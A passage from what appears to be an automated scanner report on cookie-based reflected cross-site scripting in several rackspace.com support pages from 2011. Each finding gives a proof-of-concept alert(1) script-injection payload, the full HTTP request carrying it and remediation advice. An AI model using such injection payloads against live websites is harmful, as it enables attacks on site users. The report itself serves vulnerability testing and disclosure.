Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/customers/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2ebad"%3balert(1)//29cb4cbffb7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ac85"%3balert(1)//ce075f08605 was submitted in the IS_UASrackuid cookie. This input was echoed as 7ac85";alert(1)//ce075f08605 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87ac85"%3balert(1)//ce075f08605; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 42672
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a89f5"><script>alert(1)</script>4e8c9114acd was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8a89f5"><script>alert(1)</script>4e8c9114acd; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c9e2"%3balert(1)//6813a524c1d was submitted in the chatslider cookie. This input was echoed as 2c9e2";alert(1)//6813a524c1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D2c9e2"%3balert(1)//6813a524c1d; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e5a1"><script>alert(1)</script>46d87369da7 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/dedicatedteam.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D1e5a1"><script>alert(1)</script>46d87369da7; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd6ae"%3balert(1)//ef442455836 was submitted in the IS_UASrackuid cookie. This input was echoed as bd6ae";alert(1)//ef442455836 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8bd6ae"%3balert(1)//ef442455836; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:10:48 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 38450
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16e00"><script>alert(1)</script>f5d83711d59 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f816e00"><script>alert(1)</script>f5d83711d59; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc3ec"><script>alert(1)</script>ee0c24c0430 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Dbc3ec"><script>alert(1)</script>ee0c24c0430; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e825"%3balert(1)//7bd105ef699 was submitted in the chatslider cookie. This input was echoed as 3e825";alert(1)//7bd105ef699 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/index.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D3e825"%3balert(1)//7bd105ef699; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7faac"><script>alert(1)</script>b5a54f69619 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f87faac"><script>alert(1)</script>b5a54f69619; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=rackspacecom%2Crackspaceglobalrackspace%3D%2526pid%253DrackspaceUS%25253Aforms%25253Acontactsales.php%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BgetURL%252528%252527/information/index.php%252527%252529%25257D%2526oidt%253D2%2526ot%253DH3%26rackmailtrust%3D%2526pid%253Dappssite%252520-%252520Apps%252520Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.rackspace.com/apps/fanatical_support/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps%23; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296920713_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A19%3A%22%2Ffanatical_support%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dcc52"%3balert(1)//17463e51f83 was submitted in the IS_UASrackuid cookie. This input was echoed as dcc52";alert(1)//17463e51f83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /managed_hosting/support/promise.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8dcc52"%3balert(1)//17463e51f83; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-3-30_4--3+6--3_42442-1---1296919161_4-6_4-6; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296938631; __utmb=47003812.4.10.1296919297; s_pv=rackspaceUS%3Ainformation%3Aindex.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; 